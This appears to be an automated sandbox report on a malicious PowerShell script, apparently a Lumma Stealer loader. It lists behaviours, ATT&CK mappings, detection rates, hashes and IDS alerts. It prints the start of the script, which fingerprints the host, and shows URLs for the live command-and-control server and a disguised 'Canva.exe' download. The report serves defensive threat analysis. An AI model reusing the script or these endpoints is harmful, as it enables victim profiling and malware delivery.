Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (repeated 118 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6136
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3647
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: powershell.exe, 00000000.00000002.2181257859.0000000006D57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\Desktop\oNvY66Z8jp.ps1 VolumeInformation
MITRE ATT&CK matrix (techniques with matched signatures carry the signature count in parentheses; the remaining cells are the matrix's unmatched techniques):

Tactic | Techniques
Reconnaissance | Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development | Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access | Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution | Windows Management Instrumentation (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence | DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation | Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion | Modify Registry (1); Virtualization/Sandbox Evasion (31); Process Injection (1); Install Root Certificate (1); DLL Side-Loading (1); Steganography; Compile After Delivery
Credential Access | OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery | Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1); File and Directory Discovery (2); System Information Discovery (21)
Lateral Movement | Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection | Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control | Encrypted Channel (1); Non-Standard Port (11); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port
Exfiltration | Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact | Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
oNvY66Z8jp.ps1 | 17% | ReversingLabs | |
oNvY66Z8jp.ps1 | 15% | Virustotal | | Browse
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://91.206.178.120:5001/script_end?random_number=$randomNumber | 100% | Avira URL Cloud | malware |
http://91.206.178.120:5001/script_end?random_number= | 100% | Avira URL Cloud | malware |
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 | 100% | Avira URL Cloud | malware |
http://91.206.178.120:5001/script_end?random_number=91530 | 100% | Avira URL Cloud | malware |
http://91.206.178.120:5001/script_start?ip= | 100% | Avira URL Cloud | malware |
http://91.206.178.120:5001 | 100% | Avira URL Cloud | malware |
http://api.ipify8r | 0% | Avira URL Cloud | safe |
http://91.206.178.120:5001/script_end?random_number=91530$M | 100% | Avira URL Cloud | malware |
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | 100% | Avira URL Cloud | malware |
https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search | 0% | Avira URL Cloud | safe |
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | 100% | Avira URL Cloud | malware |
https://hostelaunpaso.com/wp-cont | 0% | Avira URL Cloud | safe |
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | 100% | Avira URL Cloud | malware |
https://hostelaunpaso.commd | 0% | Avira URL Cloud | safe |
https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
hostelaunpaso.com | 172.67.149.252 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=91530 | true | Avira URL Cloud: malware | unknown
http://api.ipify.org/ | false | | high
https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search/Canva.exe | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://91.206.178.120:5001/script_end?random_number=91530 | powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://91.206.178.120:5001/script_end?random_number=$randomNumber | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | false | Avira URL Cloud: malware | unknown
https://go.micro | powershell.exe, 00000000.00000002.2176348749.00000000052CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://91.206.178.120:5001/script_end?random_number= | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://91.206.178.120:5001/script_end?random_number=91530$M | powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.ipify.org/P& | powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.ipify.org/p | powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://91.206.178.120:5001/script_start?ip= | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://91.206.178.120:5001 | powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2181480428.0000000006DB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://api.ipify8r | powershell.exe, 00000000.00000002.2176348749.0000000004F74000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.ipify.org | notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | false | | high
https://hostelaunpaso.com/wp-content/plugins/motopress-hotel-booking/templates/create-booking/search | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | false | Avira URL Cloud: safe | unknown
http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3314939941.00000188D23C9000.00000004.00000020.00020000.00000000.sdmp, oNvY66Z8jp.ps1 | false | Avira URL Cloud: malware | unknown
https://hostelaunpaso.com/wp-cont | powershell.exe, 00000000.00000002.2176348749.0000000004B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2176348749.0000000004A1D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | powershell.exe, 00000000.00000002.2176348749.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2179858146.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hostelaunpaso.commd | powershell.exe, 00000000.00000002.2176348749.0000000004A03000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2176348749.0000000004771000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | US | 13335 | CLOUDFLARENET | false
91.206.178.120 | unknown | Poland | PL | 200088 | ARTNET2 | true
172.67.149.252 | hostelaunpaso.com | United States | US | 13335 | CLOUDFLARENET | true
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1617746
                                    Start date and time:2025-02-18 08:26:34 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 38s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:oNvY66Z8jp.ps1
                                    renamed because original name is a hash value
                                    Original Sample Name:5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d.ps1
                                    Detection:MAL
                                    Classification:mal80.troj.winPS1@3/7@2/3
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 88%
                                    • Number of executed functions: 30
                                    • Number of non-executed functions: 9
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.109.210.53
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 5676 because it is empty
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
02:27:28 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Pmw24ExIdx.ps1 | malicious | Unknown | api.ipify.org/
 | DeepLauncher.exe | malicious | Unknown | api.ipify.org/
 | [Huawei] Contract for YouTube partners.exe | malicious | Unknown | api.ipify.org/
 | NexoPack Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
 | NexoPack Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
 | lO5lV39HDj.exe | malicious | DarkTortilla, Quasar | api.ipify.org/
 | SpacesVoid Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/
 | 55ryoipjfdr.exe | malicious | Trickbot | api.ipify.org/
 | Yoranis Setup.exe | malicious | Unknown | api.ipify.org/
 | RtU8kXPnKr.exe | malicious | Quasar | api.ipify.org/
91.206.178.120 | Pmw24ExIdx.ps1 | malicious | Unknown | 91.206.178.120:5001/script_end?random_number=66350
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | Pmw24ExIdx.ps1 | malicious | Unknown | 104.26.12.205
 | SecuriteInfo.com.Win32.Evo-gen.5457.19170.exe | malicious | AgentTesla, GuLoader | 104.26.12.205
 | LmIclOjfqc.exe | malicious | AgentTesla | 104.26.13.205
 | http://account-5036237.kurhaus-steina.com/ | malicious | Unknown | 104.26.12.205
 | http://account-5078804.kurhaus-steina.com/ | malicious | Unknown | 104.26.13.205
 | https://business.accounts-security-center-overview.com/case | malicious | Unknown | 172.67.74.152
 | https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org | malicious | HTMLPhisher | 172.67.74.152
 | https://s3.us-east-2.amazonaws.com/tril-laxy-glow/UwyHSGw.html?EMAIL=mohallstaff@mohmuseum.org | malicious | HTMLPhisher | 104.26.12.205
 | DeepLauncher.exe | malicious | Unknown | 104.26.12.205
 | [Huawei] Contract for YouTube partners.exe | malicious | Unknown | 104.26.12.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Pmw24ExIdx.ps1 | malicious | Unknown | 104.26.12.205
 | Kariny CV.vbs | malicious | Unknown | 188.114.96.3
 | Commercial Invoice Confirmation-1132346.vbs | malicious | Unknown | 104.21.16.1
 | jjmax il.vbs | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 104.22.74.216
 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 172.67.74.232
 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 104.18.27.193
 | FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | 104.21.32.1
 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 104.18.27.193
 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 172.67.23.234
ARTNET2PL | Pmw24ExIdx.ps1 | malicious | Unknown | 91.206.178.120
 | 4Osfx7gnSx.exe | malicious | DCRat, PureLog Stealer, zgRAT | 185.104.113.237
 | fqJIOoSp5U.dll | malicious | Unknown | 91.206.178.125
 | QZzvG5G6VE.exe | malicious | Stealc | 91.206.178.118
 | mrkjKujfkP.exe | malicious | Stealc | 91.206.178.118
 | vR19oQpY8c.exe | malicious | Stealc | 91.206.178.118
 | sql.tmp.dll.dll | malicious | Unknown | 91.206.178.125
 | UrQrIdRfCg.exe | malicious | Unknown | 185.104.112.62
 | http://tldbonak.com | malicious | Unknown | 91.206.178.97
 | 7ECHtNYRdu.exe | malicious | Vidar | 185.104.114.24
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Pmw24ExIdx.ps1 | malicious | Unknown | 172.67.149.252
 | Commercial Invoice Confirmation-1132346.vbs | malicious | Unknown | 172.67.149.252
 | jjmax il.vbs | malicious | Snake Keylogger, VIP Keylogger | 172.67.149.252
 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 172.67.149.252
 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 172.67.149.252
 | Payment_Activity_0104_2025-2-17.vbs | malicious | Unknown | 172.67.149.252
 | FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe | malicious | DBatLoader, Snake Keylogger, VIP Keylogger | 172.67.149.252
 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 172.67.149.252
 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 172.67.149.252
 | Payment_Activity_0079_2025-2-17.vbs | malicious | Unknown | 172.67.149.252
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2704
                                    Entropy (8bit):5.420017244578641
                                    Encrypted:false
                                    SSDEEP:48:AKYNSU4y4RQmFoUeWmfmZ9tK8NTXGiR80xnqvq8kyUbaImx10ln0zJ6JAwqgt:AvkHyIFKL3OZ2KTXGib2kyGaImM0d6JZ
                                    MD5:9AC6DD09BEBA8A0C84F58C8D81E67273
                                    SHA1:2CBD4ADD18815DA890B629171165978D2DED2550
                                    SHA-256:BABB9DBB4F1B96790591A332F83BFCAD04BD4641C21FBEEDA59182CB35678392
                                    SHA-512:84FE85F7B27E05F302084CC91C85EC58A0C7FA1D82CA1ED417153DD6119DD1C86712BC814FD4B8EA60569CE1912A9D01003B0CF07B5B168D478AF65520D23D04
                                    Malicious:false
                                    Reputation:low
Preview:(binary data, not shown)
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6222
                                    Entropy (8bit):3.710920439852509
                                    Encrypted:false
                                    SSDEEP:48:JOWWCjCPbU2K+DjukvhkvklCywDn22Yfpy+L7BNSogZoKWYfpy+L7BNSogZo+1:gW/jCooWkvhkvCCt+fpJLSHlfpJLSH5
                                    MD5:087818FF8B36CF500519D9FE7A2FDE34
                                    SHA1:8CFBCF2581BCC3B460048FBCDD08F7EF3352122A
                                    SHA-256:35052500F334A9BE165A70A9869CF29102CB51FB52C4C00157CA6D2B071DFB83
                                    SHA-512:0E5E90D4EEE735E85AE314705044FCC5DCDC720EBABAC211AAD193D994E2E09CEC990AFC50FA0AE02FB0AA52D6D913C822CD0E04BEF2FB4644DCCC50F205C692
                                    Malicious:false
Preview:(binary data, not shown)
                                    File type:ASCII text, with very long lines (743), with no line terminators
                                    Entropy (8bit):5.361269025932874
                                    TrID:
                                      File name:oNvY66Z8jp.ps1
                                      File size:743 bytes
                                      MD5:979fbff01ba40f65e4eae87012b024a0
                                      SHA1:4ff2c55e9b40206244f6f93b097a818cffb0d6d2
                                      SHA256:5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d
                                      SHA512:6efd7b33d1e0d33237195347f434e9056f41046737410be8a9598353578be3a470e310d581d7bfe864af69c05ff89e7ad52af44490478b0ef7756c14012061c6
                                      SSDEEP:12:WVBuiG3wEQ2aHWj25ioWAR+wpbZ6l/6gLhYdGHAyG3m6x+S+IvT/Iy5hu1M4AGsL:BP3wEqHu25xxUlpLhNHAf3m6WQT/H5h9
                                      TLSH:5201DC31B73C828483D5C860B8B9B702C1877B40EA6EECFC25EC3000C6832E13DA4A18
                                      File Content Preview:$randomNumber=Get-Random -Minimum 10000 -Maximum 99999; $ipAddress=(Invoke-WebRequest -Uri 'http://api.ipify.org').Content; $osVersion=[System.Environment]::OSVersion.VersionString; $memory=[math]::round((Get-CimInstance -ClassName Win32_ComputerSystem).T
                                      Icon Hash:3270d6baae77db44
                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                      2025-02-18T08:27:29.827006+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.5 | 49704 | 104.26.12.205 | 80 | TCP
                                      2025-02-18T08:27:32.048026+0100 | 2860232 | ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) | 1 | 192.168.2.5 | 49705 | 91.206.178.120 | 5001 | TCP
                                      2025-02-18T08:27:32.048026+0100 | 1810000 | Joe Security ANOMALY Windows PowerShell HTTP activity | 2 | 192.168.2.5 | 49705 | 91.206.178.120 | 5001 | TCP
                                      2025-02-18T08:27:32.048110+0100 | 2860233 | ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) | 1 | 91.206.178.120 | 5001 | 192.168.2.5 | 49705 | TCP
